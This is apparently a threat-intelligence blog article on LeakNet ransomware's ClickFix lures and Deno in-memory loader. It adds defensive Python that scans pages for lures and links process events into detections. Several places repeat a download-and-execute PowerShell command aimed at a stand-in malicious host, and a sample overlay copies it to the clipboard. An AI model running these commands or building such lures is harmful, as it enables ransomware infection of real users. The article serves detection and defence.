LeakNet Ransomware Exploits ClickFix Tactics and Deno Loader

Introduction
In the ever‑evolving landscape of cybercrime, ransomware operators constantly adapt their tactics to stay ahead of defenses. The group behind LeakNet – a relatively new but increasingly prolific ransomware family – has recently adopted a two‑pronged approach that blends classic social engineering with cutting‑edge runtime techniques. By exploiting the ClickFix ploy on compromised web pages and delivering a Deno in‑memory loader, LeakNet sidesteps many traditional security controls and accelerates the infection timeline.
This article dissects the new attack chain, explains why the ClickFix method is gaining traction, and highlights the technical nuances of the Deno loader. We also provide practical mitigation steps for security teams and discuss what the emergence of this hybrid technique means for the broader ransomware ecosystem.
ClickFix: A Deceptive Social‑Engineering Vector
ClickFix is a form of social engineering that tricks users into running a command that looks like a harmless troubleshooting step to “fix” an imagined problem on their computer. The attacker typically compromises a legitimate website (or stands up a convincing look‑alike), injects a pop‑up or banner claiming that the visitor’s system is infected, misconfigured, or has failed a verification check, and supplies a short command‑line snippet that supposedly resolves the issue. The snippet is, in reality, the first stage of a malware download.
- Delivery medium: Compromised or maliciously crafted websites that attract visitors via SEO poisoning, malvertising, or compromised ad networks.
- Psychological trigger: Fear of system instability combined with a promise of an easy, one‑click fix.
- Technical execution: The displayed command, usually pasted into the Windows Run dialog (Win+R) or a terminal, invokes PowerShell or Bash to reach out to a remote server, fetch the next stage, and execute it in memory.
What makes ClickFix especially dangerous is its reliance on user interaction rather than exploiting a software vulnerability. This means that traditional vulnerability scanners and exploit‑prevention tools often miss the initial foothold entirely. Moreover, because the command is presented as a benign troubleshooting step, many users – especially those with limited technical knowledge – comply without a second thought.
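One place a web‑filtering team can act on this is the page itself: a ClickFix lure almost always pairs a script that writes to the clipboard with text telling the visitor to run an interpreter or open the Run dialog. The scanner below is an added example, not code from the original article or from Grivyonx; its indicator patterns, weights and threshold are assumptions for illustration, and the three HTML samples (one lure built around the command quoted later in this article, one benign “copy” button, one legitimate installer page) are constructed.

```python
"""Heuristic scan of page content for ClickFix-style lures.

Added example; it is not code from the original article or from Grivyonx. It
applies a common ClickFix heuristic (script that writes to the clipboard on the
same page that tells the visitor to run a command interpreter or open the Run
dialog) to constructed sample HTML. Indicator patterns and weights are
illustrative assumptions, not a published scoring model.
"""
import re
from dataclasses import dataclass, field
from typing import List

# (name, pattern, weight). The clipboard write and the interpreter name are
# the strongest signals; the lure wording alone is weak.
INDICATORS = [
    ("clipboard_write", re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I), 3),
    ("run_dialog", re.compile(r"Win(dows)?\s*(\+|key)\s*R\b|Run\s+dialog", re.I), 2),
    ("interpreter", re.compile(r"\b(powershell|pwsh|mshta|cmd\.exe|bash\s+-c)\b|curl[^<]{0,80}\|\s*(ba)?sh\b", re.I), 3),
    ("remote_fetch", re.compile(r"DownloadString|Invoke-WebRequest|Invoke-Expression|\b(iwr|irm|iex)\b", re.I), 2),
    ("fix_lure", re.compile(r"\b(fix|repair|verify|unable to)\b[^<]{0,40}\b(error|problem|issue|robot|human)\b", re.I), 1),
]
THRESHOLD = 5  # assumption: tune against your own traffic


@dataclass
class ScanResult:
    score: int
    hits: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def scan_html(html: str) -> ScanResult:
    """Score a page body; hits are returned in indicator order."""
    result = ScanResult(0)
    for name, pattern, weight in INDICATORS:
        if pattern.search(html):
            result.hits.append(name)
            result.score += weight
    return result


# Constructed sample 1: a ClickFix overlay. The command string is the one quoted
# in the article; the surrounding markup is made up for this example.
LURE_HTML = """
<div class="overlay">
  <p>Your browser could not verify you are human. To fix this error, press
  <b>Win + R</b>, paste the fix and press Enter.</p>
  <button id="fix">Copy fix</button>
</div>
<script>
document.getElementById('fix').addEventListener('click', () => {
  navigator.clipboard.writeText(`powershell -c "iex ((New-Object Net.WebClient).DownloadString('http://malicious.example.com/loader'))"`);
});
</script>
"""

# Constructed sample 2: an ordinary docs page with a copy button (should not fire).
BENIGN_HTML = """
<h2>Install</h2>
<pre>npm install left-pad</pre>
<button onclick="navigator.clipboard.writeText('npm install left-pad')">Copy</button>
"""

# Constructed sample 3: a legitimate installer page. It scores as suspicious,
# which is the known false positive of this heuristic.
DOCS_HTML = """
<h2>Install with PowerShell</h2>
<pre>irm https://get.example.org/install.ps1 | iex</pre>
<button onclick="navigator.clipboard.writeText(document.querySelector('pre').innerText)">Copy</button>
"""

if __name__ == "__main__":
    for label, page in (("lure", LURE_HTML), ("benign", BENIGN_HTML), ("docs", DOCS_HTML)):
        r = scan_html(page)
        print(f"{label}: score={r.score} suspicious={r.suspicious} hits={r.hits}")
```

The third sample is the important caveat: a vendor page that publishes a `irm ... | iex` one‑liner next to a copy button is indistinguishable from a lure by content alone, so this score should feed a review queue or be combined with domain reputation and page age rather than block on its own.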
Deno In‑Memory Loader: Evading Traditional Defenses
Once the victim executes the ClickFix command, the script contacts a command‑and‑control (C2) server that delivers a TypeScript payload to be run by Deno, a modern runtime for JavaScript and TypeScript. Deno ships as a single, dependency‑free executable that can run remote modules directly, which is what makes it attractive to a threat actor: one binary fetched onto the host is enough to execute code pulled from the C2. Its permission sandbox, often cited as a security feature, offers the victim no protection in this scenario because the attacker controls the flags it is started with.
The Deno loader employed by LeakNet operates entirely in memory. Instead of writing the payload to disk, the loader hands Deno a module fetched over the network (or code passed inline on the command line), and the runtime transpiles and executes it inside its embedded V8 engine; the resulting JavaScript never exists as a file on the victim’s disk. This in‑memory technique offers several advantages for the attacker:
- File‑less execution: Antivirus solutions that rely on signature‑based scanning of files on disk are bypassed.
- Reduced forensic artifacts: Without a written executable, post‑incident investigators have fewer artefacts to trace. One caveat: when the payload is loaded as a remote module rather than passed inline, Deno’s module cache (DENO_DIR, by default under %LOCALAPPDATA%\deno on Windows) can retain a copy of the fetched source, so investigators should collect that directory before concluding nothing touched disk.
- Rapid deployment: The payload can be fetched, compiled, and executed in seconds, shortening the window for detection.
Deno also supports TypeScript out of the box, so the operators can write maintainable typed code and have it run on the victim without a separate build step. Its permission flags (--allow-net, --allow-read, --allow-write, --allow-run, or -A for everything) are worth understanding correctly: they restrict what a script may do only when the person launching Deno withholds them. Here the attacker writes the command line, so the loader is simply started with whatever permissions the ransomware stage needs, and the sandbox protects nobody. For defenders the flags are still useful as a signal: a Deno process started with -A or --allow-run against a remote module URL is far more suspicious than a developer’s deno run --allow-net=localhost:8000 server.ts.
LeakNet’s Evolving Attack Chain
The combination of ClickFix and a Deno in‑memory loader represents a significant evolution in LeakNet’s operational playbook. Below is a step‑by‑step breakdown of the typical infection flow:
- Initial lure: Victims land on a compromised website that displays a ClickFix banner claiming a critical error.
- User interaction: The banner presents a short command that the user copies and runs, for example:
  powershell -c "iex ((New-Object Net.WebClient).DownloadString('http://malicious.example.com/loader'))"
- Bootstrap script: The PowerShell command fetches a tiny bootstrap script from the attacker’s server and executes it in memory via Invoke-Expression (iex).
- Deno payload retrieval: The bootstrap script downloads a Deno binary (or uses a pre‑installed Deno) and instructs it to pull a TypeScript payload from the C2.
- In‑memory execution: Deno compiles the TypeScript in memory and executes it without ever writing the compiled JavaScript to disk.
- Ransomware deployment: The in‑memory code performs system enumeration, encrypts files, drops ransom notes, and optionally exfiltrates data.
Because each stage is lightweight and can be delivered over HTTPS, the attack is difficult to distinguish from legitimate traffic. Moreover, the use of Deno—a runtime not yet widely monitored by endpoint detection platforms—adds an extra layer of obscurity.
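Put together, the Deno permission nuance from the previous section and the chain above give a SOC two things to detect and one thing to correlate: a shell spawned from explorer.exe with a download‑and‑execute command line, a Deno process started with dangerous permissions against a remote module, and the parent‑child link between them. The code below is an added example, not code from the original article or from Grivyonx. It parses Deno’s flags according to the public CLI conventions (-A/--allow-all, --allow-<perm>[=list], --deny-<perm>[=list]), which is an assumption about the runtime rather than something the article states; the process events, hostnames, paths and risk rules are constructed for illustration.

```python
"""Endpoint-side detection for the ClickFix -> Deno chain.

Added example; not code from the original article or from Grivyonx. It runs over
constructed process-creation events shaped loosely like Sysmon Event ID 1 (image,
parent image, command line, pid/ppid). Deno flag parsing follows the public CLI
conventions (-A/--allow-all, --allow-<perm>[=list], --deny-<perm>[=list]); the
risk rules and the sample hostnames/paths are assumptions for illustration.
"""
import re
import shlex
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Stage 1: a shell launched from the Run dialog (child of explorer.exe) with a
# download-and-execute command line. mshta.exe is an assumption beyond the
# article's own list; ClickFix lures commonly use it.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
DOWNLOAD_EXEC = re.compile(
    r"downloadstring|invoke-webrequest|invoke-expression|\b(iwr|irm|iex)\b"
    r"|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_clickfix_launch(ev: dict) -> bool:
    return (basename(ev["image"]) in LOLBINS
            and basename(ev["parent_image"]) == "explorer.exe"
            and DOWNLOAD_EXEC.search(ev["command_line"]) is not None)


# Stage 2: Deno running remote or inline code with dangerous permissions.
REMOTE_SCHEMES = ("http://", "https://", "data:", "blob:", "jsr:", "npm:")
ALL_PERMS = {"read", "write", "net", "env", "run", "ffi", "sys"}
DANGEROUS = {"write", "run", "ffi"}  # enough to encrypt files or spawn tools
# Flags whose value is the next token (partial list). Permission flags use the
# --flag=value form, so they never consume the following token.
SEPARATE_VALUE_FLAGS = {"--config", "-c", "--import-map", "--lock", "--cert", "--location"}


@dataclass
class DenoInvocation:
    subcommand: Optional[str]
    specifier: Optional[str]
    granted: Set[str]

    @property
    def remote(self) -> bool:
        return bool(self.specifier) and self.specifier.lower().startswith(REMOTE_SCHEMES)

    @property
    def risky(self) -> bool:
        if self.subcommand == "eval":
            return True  # the payload exists only on the command line
        return self.remote and bool(self.granted & DANGEROUS)


def parse_deno(command_line: str) -> DenoInvocation:
    # posix=False keeps Windows backslashes intact; quotes are stripped by hand.
    argv = [t.strip('"') for t in shlex.split(command_line, posix=False)]
    sub = argv[1] if len(argv) > 1 and not argv[1].startswith("-") else None
    granted: Set[str] = set()
    denied: Set[str] = set()
    spec, i = None, 2
    while i < len(argv):
        tok = argv[i]
        if tok in ("-A", "--allow-all"):
            granted |= ALL_PERMS
        elif tok.startswith("--allow-"):
            granted.add(tok[8:].partition("=")[0])
        elif tok.startswith("--deny-"):
            name, _, lst = tok[7:].partition("=")
            if not lst:  # a bare --deny-<perm> overrides any --allow, including -A
                denied.add(name)
        elif tok in SEPARATE_VALUE_FLAGS:
            i += 1
        elif not tok.startswith("-"):
            spec = tok
            break  # later tokens are the script's own arguments
        i += 1
    return DenoInvocation(sub, spec, granted - denied)


@dataclass
class Alert:
    kind: str
    pids: List[int]
    detail: str


def detect(events: List[dict]) -> List[Alert]:
    """Link a risky Deno launch to a stage-1 ancestor via pid/ppid. pid-only
    linkage is fine inside one log window; key on the sensor's process GUID in
    production, since pids are reused."""
    by_pid: Dict[int, dict] = {ev["pid"]: ev for ev in events}
    stage1 = {ev["pid"] for ev in events if is_clickfix_launch(ev)}
    alerts: List[Alert] = []
    for ev in events:
        if basename(ev["image"]) not in ("deno.exe", "deno"):
            continue
        inv = parse_deno(ev["command_line"])
        if not inv.risky:
            continue
        ancestor, pid, depth = None, ev["ppid"], 0
        while pid in by_pid and depth < 8 and ancestor is None:
            if pid in stage1:
                ancestor = pid
            pid, depth = by_pid[pid]["ppid"], depth + 1
        detail = f"deno {inv.subcommand} {inv.specifier} granted={sorted(inv.granted)}"
        if ancestor is not None:
            stage1.discard(ancestor)
            alerts.append(Alert("clickfix_deno_chain", [ancestor, ev["pid"]], detail))
        else:
            alerts.append(Alert("deno_remote_payload", [ev["pid"]], detail))
    alerts += [Alert("clickfix_launch", [p], by_pid[p]["command_line"]) for p in sorted(stage1)]
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
EVENTS = [  # constructed sample telemetry
    {"pid": 4100, "ppid": 900, "image": EXPLORER, "parent_image": r"C:\Windows\System32\userinit.exe", "command_line": "explorer.exe"},
    {"pid": 5320, "ppid": 4100, "image": PS, "parent_image": EXPLORER,  # the article's ClickFix command pasted into Win+R
     "command_line": "powershell -c \"iex ((New-Object Net.WebClient).DownloadString('http://malicious.example.com/loader'))\""},
    {"pid": 5344, "ppid": 5320, "image": r"C:\Users\victim\AppData\Local\Temp\deno.exe", "parent_image": PS,
     "command_line": "deno.exe run -A --no-prompt https://malicious.example.com/payload.ts"},
    {"pid": 6100, "ppid": 7000, "image": r"C:\Users\dev\.deno\bin\deno.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "deno run --allow-net=localhost:8000 --allow-read=. server.ts"},  # benign developer use
    {"pid": 6200, "ppid": 4100, "image": PS, "parent_image": EXPLORER, "command_line": "powershell -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a.kind, a.pids, a.detail)
```

Two design points: the developer’s local Deno server and the harmless Run‑dialog command both stay silent, which is what keeps this rule deployable, and a bare --deny-write/--deny-run/--deny-ffi is honoured even after -A, so the rule reasons about the permissions the process actually ends up with rather than pattern‑matching on “-A”.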
Mitigation Strategies and Best Practices
Defending against this hybrid technique requires a blend of user education, network hygiene, and advanced detection capabilities:
- Security awareness training: Reinforce the principle that users should never execute commands copied from web pages, especially those that claim to “fix” an issue.
- Web filtering and DNS sinkholing: Block known malicious domains and employ threat‑intel feeds that flag sites used for ClickFix campaigns.
- Application control policies: Use AppLocker or Windows Defender Application Control to restrict PowerShell, cmd.exe, and especially Deno to users with an approved business need, and block execution from user‑writable locations such as %TEMP% and %APPDATA%, which is where a freshly downloaded deno.exe would land. Where PowerShell must remain available, enforce Constrained Language Mode.
- Endpoint detection and response (EDR): Deploy solutions capable of monitoring in‑memory activity, script execution, and anomalous network connections. A high‑signal rule for this chain is explorer.exe spawning powershell.exe with a download‑and‑execute command line (DownloadString, Invoke-WebRequest, iex), followed by that PowerShell process spawning deno.exe with broad permissions and a remote module URL.
- Network traffic analysis: Use TLS inspection to detect suspicious downloads of Deno binaries or TypeScript payloads, even when encrypted.
- Patch management: Keep browsers, plugins, and content‑management systems up to date to reduce the risk of website compromise that could host ClickFix banners.
Organizations should also treat script execution with a zero‑trust mindset: privileged shell sessions should go through an MFA‑backed privileged‑access workflow, and everything a shell does should be logged. On Windows that means enabling PowerShell Script Block Logging (Event ID 4104) and Module Logging, and turning on command‑line capture for process‑creation events (Security Event ID 4688 with the “Include command line in process creation events” policy, or Sysmon Event ID 1), which is what makes a deno.exe launch and its permission flags visible to investigators after an incident.
Grivyonx Expert Analysis
From a threat‑intelligence perspective, LeakNet’s adoption of ClickFix signals a broader shift toward user‑centric attack vectors. Historically, ransomware groups have relied heavily on credential‑theft, phishing attachments, or remote‑desktop brute forcing. By moving the initial foothold to a “user‑initiated” scenario, LeakNet reduces its exposure to credential‑dumping detection tools and improves the likelihood of a successful infection on well‑hardened networks.
The choice of Deno is equally noteworthy. While PowerShell remains the lingua franca of Windows‑based malware, Deno offers cross‑platform capabilities and a modern execution model that can evade legacy detection signatures. Its built‑in sandboxing can be subverted by simply granting the necessary permissions, a nuance that many security teams overlook when crafting policy baselines. In short, the LeakNet campaign illustrates the convergence of social engineering and emerging runtimes—a combination that will likely inspire copycats across the ransomware ecosystem.
For defenders, the key takeaway is to broaden the scope of “script‑only” monitoring. Traditional security stacks focus on PowerShell and JavaScript in browsers, but Deno, Node.js, and even newer runtimes like Bun are gaining traction among threat actors. Investing in behavioral analytics that flag abnormal memory‑only code execution, regardless of the runtime, will be a decisive advantage in the months ahead.
Conclusion
LeakNet’s recent campaign demonstrates how ransomware operators are blending classic social‑engineering tricks with advanced, file‑less execution techniques to outmaneuver traditional defenses. By exploiting the ClickFix ploy on compromised websites and delivering a Deno in‑memory loader, the group achieves rapid, stealthy infections that challenge both user awareness programs and technical controls.
Organizations that prioritize continuous security education, enforce strict script execution policies, and adopt modern EDR solutions capable of detecting in‑memory activity will be better positioned to thwart such hybrid attacks. As the threat landscape evolves, leveraging AI‑driven automation and threat‑intelligence platforms—like those offered by Grivyonx Cloud—can help security teams stay ahead of adversaries without overwhelming analysts with alerts.

Gourav Rajput
Founder of Grivyonx Technologies


